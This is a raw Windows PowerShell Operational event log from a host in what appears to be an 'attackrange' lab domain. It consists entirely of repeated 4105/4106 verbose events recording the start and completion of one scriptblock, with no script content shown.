Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1475496
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1475495
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1475494
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1475493
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1475492
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1475491
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1475490
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1475489
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1475488
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1475487
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1475486
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1475485
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1475484
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1475483
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1475482
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1475481
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1475480
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1475479
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1475478
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1475477
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1475476
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1475475
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1475474
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1475473
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1475472
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1475471
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1475470
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1475469
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1475468
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1475467
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1475466
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1475465
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1475464
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1475463
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1475462
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1475461
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1475460
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1475459
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1475458
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1475457
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1475456
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1475455
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1475454
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1475453
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1475452
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1475451
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1475450
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1475449
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1475448
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1475447
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1475446
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1475445
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1475444
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1475443
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
